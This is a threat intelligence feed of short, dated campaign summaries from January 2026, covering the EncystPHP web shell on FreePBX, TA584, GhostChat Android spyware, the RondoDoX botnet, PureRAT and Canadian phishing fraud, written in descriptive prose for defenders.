LATEST THREAT INTELLIGENCE.
Unveiling the Weaponized Web Shell EncystPHP
Description: A sophisticated web shell named EncystPHP has been discovered, targeting FreePBX systems through the CVE-2025-64328 vulnerability. Associated with the hacker group INJ3CTOR3, this malware exhibits advanced capabilities including remote command execution, persistence mechanisms, and web shell deployment. The attack originated from Brazil, targeting an Indian technology company. EncystPHP employs various techniques to maintain persistence, including creating cron jobs, injecting SSH keys, and deploying multiple instances of itself. It also attempts to evade detection by deleting logs and masquerading as legitimate FreePBX files. The malware's impact includes full system compromise, unauthorized administrative access, and potential abuse of telephony resources. Organizations are advised to treat any successful exploitation as a critical incident requiring immediate remediation and security hardening.
Created at: 2026-01-28T18:26:17.029000
Updated at: 2026-01-28T21:21:20.901000
Can't stop, won't stop: TA584 innovates initial access
Description: TA584, a prominent initial access broker targeting organizations globally, demonstrated significant changes in attack strategies throughout 2025. The actor expanded its global targeting, adopted ClickFix social engineering techniques, and began delivering new malware called Tsundere Bot. TA584's operational tempo increased, with monthly campaigns tripling from March to December. The actor uses various delivery methods via email, often sending from compromised individual accounts. TA584's campaigns now feature rapid succession and overlapping, with distinct lure themes and short operational lifespans. The actor has shown adaptability in social engineering, brand impersonation, and payload delivery, making static detection less effective. Recent payloads include XWorm with the 'P0WER' configuration and the newly observed Tsundere Bot, both likely part of Malware-as-a-Service offerings.
Created at: 2026-01-28T18:26:15.886000
Updated at: 2026-01-28T21:18:10.650000
Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan
Description: A sophisticated Android spyware campaign targeting individuals in Pakistan has been uncovered, using romance scam tactics as a lure. The malicious app, named GhostChat, poses as a chat platform with fake female profiles, requiring hardcoded passcodes to access. Once installed, it enables covert surveillance and data exfiltration. The campaign is part of a broader spy operation, including a ClickFix attack compromising victims' computers and a WhatsApp device-linking attack gaining access to victims' accounts. These related attacks used websites impersonating Pakistani governmental organizations. The threat actor employs multiple tactics across mobile and desktop platforms, blending social engineering, malware delivery, and espionage techniques.
Created at: 2026-01-28T18:26:16.374000
Updated at: 2026-01-28T21:14:11.115000
Infrastructure of Interest: Medium Confidence Detection
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous patterns, behavioral analysis of malicious activity, and cross-referenced intelligence from endpoint telemetry and external sources. Use this data to enhance detection rules, block malicious infrastructure, or correlate with existing incident investigations. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:39:42.586000
Updated at: 2026-01-28T21:02:05.918000
Infrastructure of Interest: Medium Confidence FastFlux
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referenced intelligence from global sinkhole data and network telemetry. The IOCs included in this pulse are associated with Fastflux networks, characterized by constantly changing IP addresses and DNS records to evade detection while maintaining resilient malicious infrastructure for phishing, malware delivery, or C2 operations. Use this data to enhance DNS-based detection rules, identify flux parent domains, and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:34:03.778000
Updated at: 2026-01-28T21:01:04.406000
RondoDoX Botnet Weaponizes React2Shell
Description: A persistent nine-month RondoDoX botnet campaign has been targeting IoT devices and web applications. The threat actors have recently shifted to weaponizing a critical Next.js vulnerability, deploying malicious payloads like 'React2Shell' and cryptominers. The campaign, spanning from March to December 2025, shows quick adaptation to latest attack trends. The activity is divided into three phases: initial reconnaissance, web application exploitation, and IoT botnet deployment. The attackers have been using multiple command and control servers and deploying various malware variants. The campaign has intensified in December 2025 with a focus on Next.js exploitation. The impact includes widespread IoT device compromise, Next.js application risks, credential harvesting, and persistent multi-architecture threats.
Created at: 2025-12-29T19:53:02.379000
Updated at: 2026-01-28T19:02:18.838000
APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP
Description: A new campaign targeting Indian government entities was uncovered, utilizing three backdoors: SHEETCREEP, FIREPOWER, and MAILCREEP. These tools leverage legitimate cloud services like Google Sheets, Firebase, and Microsoft Graph API for command and control, enabling the attackers to blend in with normal traffic. The campaign, named Sheet Attack, employed PDFs and malicious LNK files as initial infection vectors. Evidence suggests the use of generative AI in malware development. While sharing similarities with APT36, the campaign's unique characteristics point to either a new Pakistan-linked group or an APT36 subgroup. The attackers demonstrated hands-on-keyboard activity and deployed additional payloads, including a document stealer, to selected targets.
Created at: 2026-01-28T17:06:45.695000
Updated at: 2026-01-28T18:56:18.209000
PureRAT: Attacker Now Using AI to Build Toolset
Description: A Vietnamese threat actor is employing AI to develop code for an ongoing phishing campaign delivering PureRAT malware and other payloads. The attacks begin with phishing emails disguised as job opportunities, potentially targeting work computers. The attacker's use of AI is evidenced by detailed comments and numbered steps in scripts, as well as instructions in debug messages. The attack chain involves malicious archives, sideloaded DLLs, and batch scripts likely authored using AI. The attacker appears to be continually refining their methods and may be selling access to compromised organizations. This case demonstrates how AI can lower the barrier to entry for less skilled attackers, helping them write code and build attack toolkits.
Created at: 2026-01-28T17:20:03.077000
Updated at: 2026-01-28T18:47:16.887000
Weekly Threat Bulletin – January 28th, 2026
Description: This weekly threat bulletin highlights several critical vulnerabilities and emerging threats. A severe RCE vulnerability in React Server Components and Next.js (CVE-2025-55182) is being actively exploited. CISA added four critical flaws to its 'Must-Patch' list, including vulnerabilities in Versa Concerto, eslint-config-prettier, Zimbra Collaboration Suite, and Vite. GitLab released patches for multiple high-severity vulnerabilities. A new macOS malware called MonetaStealer targets crypto wallets and financial data. Lastly, a critical RCE vulnerability in Oracle E-Business Suite (CVE-2025-61882) is being actively exploited by threat actors, including the Clop ransomware group.
Created at: 2026-01-28T13:31:30.733000
Updated at: 2026-01-28T15:45:53.935000
Pivoting From PayTool: Tracking Various Frauds and E-Crime Targeting Canada
Description: This investigation exposes a complex fraud ecosystem targeting Canadians through impersonation of government services and trusted brands. Attackers exploit digital dependencies for transportation, taxation, parcel delivery, and travel using convincing campaigns. The activity is linked to the 'PayTool' phishing framework, specializing in traffic violation scams. Additional infrastructure impersonates Canada Revenue Agency, Air Canada, and Canada Post. Threat actors commercialize these campaigns on underground forums, selling phishing kits mimicking official services. Victims are lured via SMS and malicious ads, using high-pressure tactics. The infrastructure employs fake validation phases and fraudulent payment gateways to harvest personal and financial data. The campaign's scope spans multiple provinces, utilizing shared hosting and domain generation patterns for scalability.
Created at: 2026-01-27T13:03:18.851000
Updated at: 2026-01-27T17:18:38.875000
